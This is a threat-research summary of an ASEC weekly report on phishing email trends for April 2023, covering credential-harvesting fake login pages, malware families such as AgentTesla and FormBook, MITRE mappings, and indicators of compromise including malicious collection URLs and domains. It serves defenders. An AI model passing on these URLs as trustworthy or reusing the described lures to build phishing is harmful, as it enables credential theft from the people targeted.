Threat Research

ASEC Weekly Phishing Email Threat Trends (April 9th, 2023 – April 15th, 2023) – ASEC BLOG

Securonix

ASEC monitors phishing email threats focused on attachments, highlighting FakePage as the dominant method that imitates real login pages to harvest credentials, followed by Downloader, Worm, and Infostealer families distributing malware and stealing data. The report also outlines distribution cases, file extensions, and fake login URL infrastructure (C2) used by actors, plus user guidance and MITRE mappings. #FakePage #SmokeLoader #GuLoader #AgentTesla #FormBook #DHL #FedEx #ImportCustoms

Keypoints

  • FakePage attachments are the most prevalent phishing delivery method (57%), where pages imitate real login screens to steal credentials.
  • Downloader (12%) and Infostealer (9%, e.g., AgentTesla, FormBook) are common payloads; Worm (9%) also appears in attachments.
  • Other detected types include Trojan (6%), Backdoor (5%), and Dropper (1%), with attachment-based distribution mirroring weekly malware trends.
  • Files are distributed via HTML/HTM/SHTML for FakePage and via compressed formats (RAR, ZIP, 7Z, GZ, etc.) for other malware attachments.
  • Case distributions include both global FakePage campaigns and Korean-targeted variants, with numerous subject/attachment combinations.
  • Key keyword to beware is “Import Customs”; a related phishing URL demonstrates how attackers lure users to fake login pages.

MITRE Techniques

  • [T1598] Phishing for Information – FakePages imitate login pages to harvest credentials, leading users to enter their account and password information. Quote: “FakePages are web pages where the threat actor has imitated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information.”
  • [T1566] Phishing – Phishing emails with attachments are used to lure victims and deliver malware. Quote: “Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce users to access fake login pages or execute malware.”
  • [T1534] Internal Spearphishing – Lateral movement via internal spearphishing techniques. Quote: “Internal Spearphishing(Lateral Movement, ID:T1534)”

Indicators of Compromise

  • [URL] Fake Page C2 URLs – https://formspree.io/f/myyazkbv, http://ingitek.ru/bitrix/admin/csss/tt/xlss.php
  • [Filename] Email attachments used in FakePage/malware cases – invoice & Tracking NumberHT2.html, Tax_Notification.html
  • [Domain] Additional phishing domains observed – formcarry.io, vigilant-rubin.185-236-228-67.plesk.page

Read more: https://asec.ahnlab.com/en/51821/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint